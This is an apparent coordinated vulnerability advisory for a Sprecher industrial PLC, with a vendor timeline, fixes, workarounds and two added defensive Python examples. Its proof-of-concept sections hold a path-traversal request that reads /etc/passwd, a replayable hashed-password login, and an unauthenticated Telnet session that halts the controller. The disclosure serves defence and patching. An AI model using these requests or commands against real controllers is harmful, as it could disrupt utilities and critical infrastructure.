### VENDOR DESCRIPTION

“Sprecher Automation GmbH offers switchgears and automation solutions for energy, industry and infrastructure processes. Our customers are power utilities, industries, transportation companies, municipal utilities and public institutions. Company-own developments and cooperations with technology partners lead to a unique product portfolio consisting of traditional electrical technologies as well as high-tech electronics.”

Source: https://www.sprecher-automation.com/en/

### BUSINESS RECOMMENDATION

SEC Consult recommends immediately patching the systems and following the hardening guide provided by the vendor (SEC Consult did not have access to the hardening guide and could not review it).

A thorough security review should be performed by security professionals, as further security issues might exist within the product.

### VULNERABILITY OVERVIEW AND DESCRIPTION

#### 1) Authenticated Path Traversal Vulnerability

The web interface of the Sprecher PLC suffers from a path traversal vulnerability. A user who is authenticated on the web interface, which is intended as a read-only interface, can download files with the permissions of the webserver (www-data). Files like “/etc/shadow” are not readable by the webserver.

#### 2) Client-Side Password Hashing

The password hashes stored on the system can be used directly to authenticate on the web interface (pass-the-hash), since the password is hashed in the user's browser during login.

#### 3) Missing Authentication

The PLC exposes a Telnet management service on TCP port 2048. This interface can be used to control the PLC and does not require any authentication.

#### 4) Permanent Denial of Service via Portscan

An aggressive TCP SYN scan on a large number of ports triggers a denial of service of the PLC service. This results in a persistent DoS of the standby PLC in an active/standby pair. Manual operator intervention is required to restore service availability.

#### 5) Outdated Linux Kernel

An ancient Linux kernel version with a high number of known security weaknesses is used for the PLC base operating system.

### PROOF OF CONCEPT

#### 1) Authenticated Path Traversal Vulnerability

Reading “passwd” is possible by triggering the following request:

```
GET /webserver/cgi-bin/spre.cgi?4_1=../../../../../../../etc/passwd HTTP/1.1
Host: <IP-Address>
Cookie: sid=<SESSION-ID>
Connection: close
Upgrade-Insecure-Requests: 1
```

The file is fetched directly from the system:

```
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:100:sync:/bin:/bin/sync
mail:x:8:8:mail:/var/spool/mail:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
operator:x:37:37:Operator:/var:/bin/sh
haldaemon:x:68:68:hald:/:/bin/sh
dbus:x:81:81:dbus:/var/run/dbus:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
sshd:x:103:99:Operator:/var:/bin/sh
[…]
```

#### 2) Client-Side Password Hashing

The passwords are hashed in JavaScript before they are transmitted to the device. Therefore the hash is as good as the password. The following request shows a login process:

```
POST /webserver/cgi-bin/spre.cgi HTTP/1.1
Host: <IP-Address>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json
Accept-Language: de
Content-Type: application/x-www-form-urlencoded
If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
Referer: http://<IP-Address>/Webserver.html?locale=de
Content-Length: 57
Connection: close

cgi_time&user=admin&pswd=<md5-hash>
```

#### 3) Missing Authentication

An administrative interface was presented after connecting to port 2048 via Telnet:

```
$ telnet <IP-Address> 2048
100 OK: Portable IEC 61131-3 RT Scheduler for Linux (RTK) $Revision: 1.17 $
Scheduling mode: application timer/timer-tick preserving
Copyright (c) kirchner SOFT GmbH 1994-2002. All rights reserved.
HELP
104 OK: Portable IEC 61131-3 RT Scheduler for Linux (RTK) $Revision: 1.17 $
Scheduling mode: application timer/timer-tick preserving
Copyright (c) kirchner SOFT GmbH 1994-2002. All rights reserved.
HELP, ? .......................... show this help
QUIT, EXIT ....................... quit command session
STOP ............................. stop execution
CONT [TASK|EP] <id> .............. continue execution
STRT ............................. start system
REST ............................. restart system if breaked
HALT ............................. quit scheduler
SHOW [TASKS|SCHED|REVISIONS] ..... show information
SHOW [BREAKPOINTS] ............... show breakpoint list
EXEC <TASK> <id> ................. execute a task
EXEC_MS <ms> [flags] ............. execute code for a specific time
EXEC_CYCLES <no> [flags] ......... execute code for cycles
STEP TASK <id> <INTO|OVER|OUT> ... single step (task)
STEP EP <id> <INTO|OVER|OUT> ..... single step (task of EP)
ADD_BREAKPOINT <bp> .............. add breakpoint
DELETE_BREAKPOINT <bp|ALL> ....... delete breakpoints
ENABLE_BREAKPOINT <bp|ALL> ....... enable breakpoints
DISABLE_BREAKPOINT <bp|ALL> ...... disable breakpoints
READ <variable> .................. read variable as string
READ_LONG <variable> ............. read variable as long
READ_DOUBLE <variable> ........... read variable as double
WRITE <variable> <value> ......... write variable with string const.
WRITE_LONG <variable> <value> .... write variable with long value
WRITE_DOUBLE <variable> <value> .. write variable with double value
GET_LONGNAME <variable> .......... get variable information
GET_TYPENAME <variable> .......... get variable information
CHECK_VAR <variable> ............. check if variable exists
USER name ........................ identify user
PASS pw .......................... authenticate with password
BIN .............................. switch to binary protocol mode
```

The PLC can be restarted with the “HALT” command (the PLC returns after about 30 seconds):

```
HALT
200 OK: shutting down application tasks
201 OK: waiting for application tasks
202 OK: shutting down system
Connection closed by foreign host.
```

#### 4) Permanent Denial of Service via Portscan

An aggressive portscan triggered a persistent denial of service of the standby PLC in an active/standby setup.

#### 5) Outdated Linux Kernel

By using the path traversal vulnerability (1), the Linux kernel version was retrieved:

```
Linux version 2.6.20-sp16 (kd@jeannie) (gcc version 4.4.6 (Buildroot 2011.05)) #1 PREEMPT Mon Feb 29 12:06:28 CET 2016
```

### VULNERABLE VERSIONS

The following versions are affected by the identified vulnerabilities:

* Authenticated Path Traversal Vulnerability
  * all versions < 8.49
* Client-Side Password Hashing
  * all versions < 8.49
* Missing Authentication
  * all versions
* Permanent Denial of Service via Portscan
  * all versions
* Outdated Linux Kernel
  * all versions < 8.49

### VENDOR CONTACT TIMELINE

* 2017-09-22: Requesting vendor security contact and encryption keys
* 2017-09-25: Vendor provides S/MIME certificate for encryption
* 2017-09-25: Advisory is submitted to the vendor
* 2017-09-25: Call with vendor contact. Contact states that the vulnerabilities are known and fixed in different newer firmware versions. Contact will provide a list of firmware versions with the fixes.
* 2017-10-02: Requesting update.
* 2017-10-02: Vendor states they will provide feedback by the following week.
* 2017-10-12: SEC Consult sends reminder for requested information.
* 2017-10-13: Vendor states they will provide the missing information by 2017-10-20.
* 2017-10-20: Vendor requests some more time (until 2017-11-03) to prepare a hardening guide to be linked in the advisory.
* 2017-11-03: Vendor provides affected and fixed versions, workaround information and a reference to the hardening guideline.
* 2018-01-29: Vendor provides an update regarding the hardening guide document ID. It was changed from 94.2.915.95 to 94.2.913.50.
* 2018-01-30: Vendor requests changes to the “passwd” file in the advisory. The vendor-specific user accounts are removed from the PoC.
* 2018-01-31: Coordinated public release.

### SOLUTION

* Authenticated Path Traversal Vulnerability
  * Fixed in version 8.49 (available since 2016-05-13)
* Client-Side Password Hashing
  * Fixed in version 8.49 (available since 2016-05-13)
* Missing Authentication
  * see workaround
* Permanent Denial of Service via Portscan
  * see workaround
* Outdated Linux Kernel
  * Fixed in version 8.49 (available since 2016-05-13)

### WORKAROUND

#### 1) Authenticated Path Traversal Vulnerability

As a workaround, if a firmware update is not feasible due to operational constraints, the webserver can be deactivated. The webserver is not necessary for operation, as all maintenance can be done via the SPRECON-E service program.

#### 2) Client-Side Password Hashing

See (1).

#### 3) Missing Authentication

Remote debugging of the Software-PLC is possible via the “secure service channel” instead of this Telnet service. The optional Telnet service can be disabled to mitigate this vulnerability. (According to the vendor it is disabled by default.)

See the vendor's hardening guideline, available to all registered customers: https://download.sprecher-automation.com/de/login (document ID 94.2.913.50).

#### 4) Permanent Denial of Service via Portscan

According to the vendor, the denial of service via portscan can be mitigated using the packet filter. See the vendor's hardening guideline, available to all registered customers: https://download.sprecher-automation.com/de/login (document ID 94.2.913.50).

#### 5) Outdated Linux Kernel

No workaround available.
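Two added examples follow; they are written for this advisory and are not SEC Consult's or Sprecher Automation's code. The first concerns finding 1 (path traversal via the `4_1` parameter of `spre.cgi`): a file resolver that refuses requests escaping the document root, and a detector that flags traversal attempts in webserver access logs. The document root `/var/www/webserver` and the log lines are assumptions constructed for the example.

```python
import os
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

WEB_ROOT = "/var/www/webserver"  # assumed document root (hypothetical)

def resolve_download(param: str, root: str = WEB_ROOT) -> Optional[str]:
    """Map the 4_1 file parameter to a path inside the document root.
    Returns None when the request would escape the root (the bug in finding 1)."""
    root = os.path.normpath(root)
    # Decode once more so %2e%2e-style encodings that reach the CGI are also caught.
    candidate = os.path.normpath(os.path.join(root, unquote(param)))
    # Compare with a trailing separator so that e.g. /var/www/webserver2 is rejected.
    if candidate != root and not candidate.startswith(root + os.sep):
        return None
    return candidate

# A '..' path component at the start, in the middle or at the end of the value.
TRAVERSAL_RE = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")

def find_traversal_attempts(log_lines: List[str]) -> List[Tuple[str, str]]:
    """Return (client_ip, 4_1 value) for spre.cgi requests whose file parameter
    contains a '..' component before or after URL decoding."""
    hits = []
    for line in log_lines:
        parts = line.split()
        # Common log format: field 6 is the request path (after the quoted method).
        if len(parts) < 7 or "spre.cgi" not in parts[6]:
            continue
        query = parse_qs(urlsplit(parts[6]).query)
        for value in query.get("4_1", []):
            if TRAVERSAL_RE.search(value) or TRAVERSAL_RE.search(unquote(value)):
                hits.append((parts[0], value))
    return hits

# Constructed sample access-log lines (common log format); not taken from the advisory.
SAMPLE_LOG = [
    '10.0.0.5 - - [31/Jan/2018:10:00:01 +0100] "GET /webserver/cgi-bin/spre.cgi?4_1=status.txt HTTP/1.1" 200 512',
    '10.0.0.9 - - [31/Jan/2018:10:00:02 +0100] "GET /webserver/cgi-bin/spre.cgi?4_1=../../../../../../../etc/passwd HTTP/1.1" 200 1220',
    '10.0.0.9 - - [31/Jan/2018:10:00:03 +0100] "GET /webserver/cgi-bin/spre.cgi?4_1=..%2F..%2Fetc%2Fhostname HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for ip, value in find_traversal_attempts(SAMPLE_LOG):
        print(f"traversal attempt from {ip}: 4_1={value!r} -> resolves to {resolve_download(value)}")
```

On the sample log the detector reports the two requests from 10.0.0.9, and the resolver returns None for both of their file parameters.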
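The second added example (again not the vendor's code) illustrates finding 2: when the browser sends `md5(password)` and the device merely compares it with the stored hash, the stored hash itself is a valid credential. It is contrasted with server-side verification of a salted PBKDF2 record, where knowing the stored record does not yield a working login. The password and parameters are constructed for the example.

```python
import hashlib
import hmac
import os

def client_side_login(stored_md5: str, submitted: str) -> bool:
    """Scheme from the advisory: the browser submits md5(password) in the pswd
    field and the device compares it with the stored hash. Whoever holds the
    stored hash can log in without knowing the password."""
    return hmac.compare_digest(stored_md5, submitted)

def make_record(password: str, iterations: int = 200_000) -> dict:
    """Server-side scheme: a per-user salted PBKDF2-HMAC-SHA256 record."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"salt": salt, "iterations": iterations, "digest": digest}

def server_side_login(record: dict, password: str) -> bool:
    """The client sends the password itself (protected in transit by TLS) and the
    device recomputes the digest; the record alone is not a usable login input."""
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 record["salt"], record["iterations"])
    return hmac.compare_digest(record["digest"], digest)

def demo() -> dict:
    password = "s3cret-example"  # constructed sample password
    stored_md5 = hashlib.md5(password.encode()).hexdigest()
    record = make_record(password)
    return {
        # Legitimate logins succeed under both schemes.
        "client_ok": client_side_login(stored_md5, hashlib.md5(password.encode()).hexdigest()),
        "server_ok": server_side_login(record, password),
        # Replaying the stored value as the credential works only client-side.
        "client_replay": client_side_login(stored_md5, stored_md5),
        "server_replay": server_side_login(record, record["digest"].hex()),
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```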